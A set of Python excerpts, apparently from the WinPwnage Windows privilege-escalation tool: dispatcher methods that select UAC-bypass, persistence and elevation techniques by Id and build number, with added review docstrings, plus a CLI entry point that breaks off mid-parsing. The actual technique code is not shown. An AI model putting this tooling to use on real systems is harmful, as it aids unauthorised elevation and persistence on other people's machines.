示例#1
	def run(self, id, payload, **kwargs):
		"""Handle the first enabled catalogue entry whose Id contains ``id``.

		Walks the module-level ``functions`` table, skipping the 'uac',
		'persist', 'elevate' and 'execute' categories whose same-named flag on
		this object is falsy. For the first entry that matches, the entry's
		"Works From" / "Fixed In" window is compared with
		``information().build_number()``: inside the window the callable named
		by "Function Name" is resolved through ``globals()`` and called with
		``payload``; outside it an error line is printed.

		Args:
			id: Text to look for, tested with ``in`` against ``str(info["Id"])``.
			payload: Handed unchanged to the resolved callable.
			**kwargs: Optional ``name`` (default 'WinPwnage') and ``add``
				(default True), forwarded only when the callable's code
				object lists those variable names.

		Returns:
			``Constant.output`` once the first matching entry has been handled
			(whether or not it was compatible); ``None`` when nothing matches.
		"""
		print_info("Attempting to run id ({}) configured with payload ({})".format(id, payload))
		for category in functions:
			# A gated category is only walked when its flag on this object is set.
			if category in ('uac', 'persist', 'elevate', 'execute') and not getattr(self, category):
				continue

			for entry in functions[category]:
				# NOTE(review): this is a substring test, not equality, so an id
				# of "1" also matches an entry whose Id is "11"; which entry is
				# selected then depends on table order and the enabled categories.
				if id not in str(entry["Id"]):
					continue

				works_from = int(entry["Works From"])
				current_build = int(information().build_number())
				if works_from <= current_build and current_build < int(entry["Fixed In"]):
					# NOTE(review): the callable is chosen by name from module
					# globals, so the table contents alone bound what can run
					# here; the table has to be treated as trusted data.
					target = globals()[entry["Function Name"]]

					# NOTE(review): co_varnames holds local variable names as
					# well as parameters, so a callable with a local called
					# 'add' or 'name' is also passed that keyword.
					local_names = target.__code__.co_varnames
					if 'add' not in local_names:
						# Callable only takes the payload.
						target(payload)
					elif 'name' in local_names:
						# A fallback name is supplied for callables that need
						# one (the original comment cites pupy integration).
						target(payload, name=kwargs.get('name', 'WinPwnage'), add=kwargs.get('add', True))
					else:
						target(payload, add=kwargs.get('add', True))
				else:
					print_error('Technique not compatible with this system.')

				return Constant.output
示例#2
    def run(self, id, payload, **kwargs):
        """Handle the first enabled catalogue entry whose Id contains ``id``.

        Iterates the module-level ``functions`` table, skipping the "uac",
        "persist" and "elevate" categories whose flag on this object is
        falsy. The first matching entry is checked against the build number
        reported by ``information().build_number()`` and, when the build is
        inside the entry's window, the callable named by "Function Name" is
        fetched from ``globals()`` and invoked.

        Args:
            id: Text tested with ``in`` against ``str(info["Id"])``.
            payload: Passed unchanged to the resolved callable.
            **kwargs: Optional ``name`` (default "WinPwnage") and ``add``
                (default True), forwarded only when the callable's code
                object lists those variable names.

        Returns:
            ``Constant.output`` after the first matching entry has been
            handled; ``None`` when no entry matches.
        """
        banner = "Attempting to run method ({id}) configured with payload ({payload})"
        print_info(banner.format(id=id, payload=payload))

        for category in functions:
            # Skip a gated category unless its same-named flag is set.
            if category in ("uac", "persist", "elevate") and not getattr(self, category):
                continue

            for entry in functions[category]:
                # NOTE(review): substring match - "1" also matches an Id of
                # "11", so the selected entry depends on table order.
                if id not in str(entry["Id"]):
                    continue

                lower_bound = int(entry["Works From"])
                build = int(information().build_number())
                if lower_bound <= build and build < int(entry["Fixed In"]):
                    # NOTE(review): name-based lookup in module globals; the
                    # table is the only thing restricting what gets called.
                    handler = globals()[entry["Function Name"]]
                    # NOTE(review): co_varnames includes locals, not just
                    # parameters, so this is a heuristic signature check.
                    names = handler.__code__.co_varnames
                    if "add" not in names:
                        handler(payload)
                    elif "name" in names:
                        handler(payload,
                                name=kwargs.get("name", "WinPwnage"),
                                add=kwargs.get("add", True))
                    else:
                        handler(payload, add=kwargs.get("add", True))
                else:
                    print_error("Technique not compatible with this system.")
                return Constant.output
示例#3
    def start(self):
        """Print one table row per catalogue entry, marked by build compatibility.

        Every entry of the enabled categories in the module-level
        ``functions`` table is reported through ``table_success`` when the
        build number from ``information().build_number()`` lies in
        ``[Works From, Fixed In)``, and through ``table_error`` otherwise.
        The 'uac', 'persist', 'elevate' and 'execute' categories are skipped
        when their flag on this object is falsy.

        Returns:
            ``Constant.output``.
        """
        notice = "Comparing build number ({}) against 'Fixed In' build numbers, false positives might happen."
        print_info(notice.format(information().build_number()))
        print_table()

        row_layout = "\t{Type}\t{Function Payload}\t\t{Admin}\t\t{Description}"
        for category in functions:
            if category in ('uac', 'persist', 'elevate', 'execute') and not getattr(self, category):
                continue

            for entry in functions[category]:
                first_build = int(entry["Works From"])
                # The build number is queried again for every entry.
                build = int(information().build_number())
                # The comparison relies on build numbers only, which is why the
                # notice above warns about false positives.
                if first_build <= build and build < int(entry["Fixed In"]):
                    report = table_success
                else:
                    report = table_error
                report(entry["Id"], row_layout.format(**entry))
        return Constant.output
示例#4
    def start(self):
        """Print one table row per catalogue entry, marked by build compatibility.

        Entries of the module-level ``functions`` table are reported with
        ``table_success`` when ``information().build_number()`` falls in
        ``[Works From, Fixed In)`` and with ``table_error`` otherwise. The
        "uac", "persist" and "elevate" categories are skipped when their flag
        on this object is falsy.

        Returns:
            ``Constant.output``.
        """
        notice = "Comparing build number ({buildnumber}) against 'Fixed In' build numbers"
        print_info(notice.format(buildnumber=information().build_number()))
        print_table()

        for category in functions:
            if category in ("uac", "persist", "elevate") and not getattr(self, category):
                continue

            for entry in functions[category]:
                first_build = int(entry["Works From"])
                # The build number is queried again for every entry.
                build = int(information().build_number())
                in_window = first_build <= build and build < int(entry["Fixed In"])
                report = table_success if in_window else table_error
                report(id=entry["Id"],
                       type=entry["Type"],
                       description=entry["Description"])
        return Constant.output
示例#5
    def start(self):
        """Print one table row per catalogue entry, marked by build compatibility.

        Entries of the module-level ``functions`` table are reported with
        ``table_success`` when ``information().build_number()`` falls in
        ``[Works From, Fixed In)`` and with ``table_error`` otherwise. Only
        the 'uac' and 'persist' categories are gated by a flag on this
        object; any other category is always listed.

        Returns:
            ``Constant.output``.
        """
        notice = "Comparing build number ({}) against 'Fixed In' build numbers, false positives might happen."
        print_info(notice.format(information().build_number()))
        print_table()

        row_layout = "\t{}\t{}\t\t{}\t\t{}"
        columns = ("Type", "Function Payload", "Admin", "Description")
        for category in functions:
            if category in ('uac', 'persist') and not getattr(self, category):
                continue

            for entry in functions[category]:
                first_build = int(entry["Works From"])
                # The build number is queried again for every entry.
                build = int(information().build_number())
                if first_build <= build and build < int(entry["Fixed In"]):
                    report = table_success
                else:
                    report = table_error
                # Each column is stringified before it is placed in the row.
                report(entry["Id"],
                       row_layout.format(*[str(entry[column]) for column in columns]))
        return Constant.output
示例#6
	def run(self, id, payload, **kwargs):
		"""Handle the first enabled catalogue entry whose Id contains ``id``.

		Iterates the module-level ``functions`` table, skipping the 'uac' and
		'persist' categories whose flag on this object is falsy. The first
		matching entry is checked against ``information().build_number()``;
		inside the entry's build window the callable named by "Function Name"
		is fetched from ``globals()`` and invoked with ``payload``.

		Args:
			id: Text tested with ``in`` against ``str(info["Id"])``.
			payload: Passed unchanged to the resolved callable.
			**kwargs: Optional ``name`` (default '') and ``add`` (default
				True), forwarded only when the callable's code object lists
				both variable names.

		Returns:
			``Constant.output`` after the first matching entry has been
			handled; ``None`` when no entry matches.
		"""
		print_info("Attempting to run id ({}) configured with payload ({})".format(id, payload))
		for category in functions:
			if category in ('uac', 'persist') and not getattr(self, category):
				continue

			for entry in functions[category]:
				# NOTE(review): substring match - "1" also matches an Id of
				# "11", so the selected entry depends on table order.
				if id not in str(entry["Id"]):
					continue

				first_build = int(entry["Works From"])
				build = int(information().build_number())
				if first_build <= build and build < int(entry["Fixed In"]):
					# NOTE(review): name-based lookup in module globals; the
					# table is the only thing restricting what gets called.
					handler = globals()[entry["Function Name"]]
					# NOTE(review): co_varnames includes locals as well as
					# parameters, so this is a heuristic signature check.
					names = handler.__code__.co_varnames
					wants_keywords = 'name' in names and 'add' in names
					if not wants_keywords:
						handler(payload)
					else:
						handler(payload, name=kwargs.get('name', ''), add=kwargs.get('add', True))
				else:
					print_error('Technique not compatible with this system.')
				return Constant.output
示例#7
    def run(self, id, payload):
        """Handle the first enabled catalogue entry whose Id contains ``id``.

        Iterates the module-level ``functions`` table, skipping the 'uac' and
        'persist' categories whose flag on this object is falsy. The first
        matching entry is checked against ``information().build_number()``;
        inside the entry's build window the callable named by "Function Name"
        is fetched from ``globals()`` and called with
        ``os.path.join(payload)``.

        Args:
            id: Text tested with ``in`` against ``str(info["Id"])``.
            payload: Path-like value handed to the resolved callable.

        Returns:
            ``Constant.output`` after the first matching entry has been
            handled; ``False`` when no entry matches.
        """
        announcement = "Attempting to run id ({}) configured with payload ({})"
        print_info(announcement.format(id, payload))

        for category in functions:
            if category in ('uac', 'persist') and not getattr(self, category):
                continue

            for entry in functions[category]:
                # NOTE(review): substring match - "1" also matches an Id of
                # "11", so the selected entry depends on table order.
                if id not in str(entry["Id"]):
                    continue

                first_build = int(entry["Works From"])
                build = int(information().build_number())
                if first_build <= build and build < int(entry["Fixed In"]):
                    # NOTE(review): name-based lookup in module globals; the
                    # table is the only thing restricting what gets called.
                    handler = globals()[entry["Function Name"]]
                    # join() with a single component does not combine anything.
                    handler(os.path.join(payload))
                else:
                    print_error('Technique not compatible with this system.')
                return Constant.output
        return False
示例#8
from __future__ import print_function
import sys
from winpwnage.core.prints import print_info
from winpwnage.core.scanner import scanner, function
from winpwnage.core.utils import information

# ASCII-art banner; this sits at module top level, so it is printed when the
# module is loaded, before main() is called.
print("""
        _                               
  _ _ _|_|___ ___ _ _ _ ___ ___ ___ ___ 
 | | | | |   | . | | | |   | .'| . | -_|
 |_____|_|_|_|  _|_____|_|_|__,|_  |___|
             |_|               |___|
""")

# Report the host's UAC level, build number and whether the process is running
# elevated. These calls sit at module top level, so they run on load, and each
# line builds its own information() object.
print_info("UAC level: {}".format(information().uac_level()))
print_info("Build number: {}".format(information().build_number()))
print_info("Running elevated: {}\n".format(information().admin()))


def main():
    #
    # Scanner
    #
    if sys.argv[1].lower() == "-scan":
        if sys.argv[2].lower() == "-uac":
            scanner(uac=True, persist=False, elevate=False,
                    execute=False).start()
        elif sys.argv[2].lower() == "-persist":
            scanner(uac=False, persist=True, elevate=False,
                    execute=False).start()
        elif sys.argv[2].lower() == "-elevate":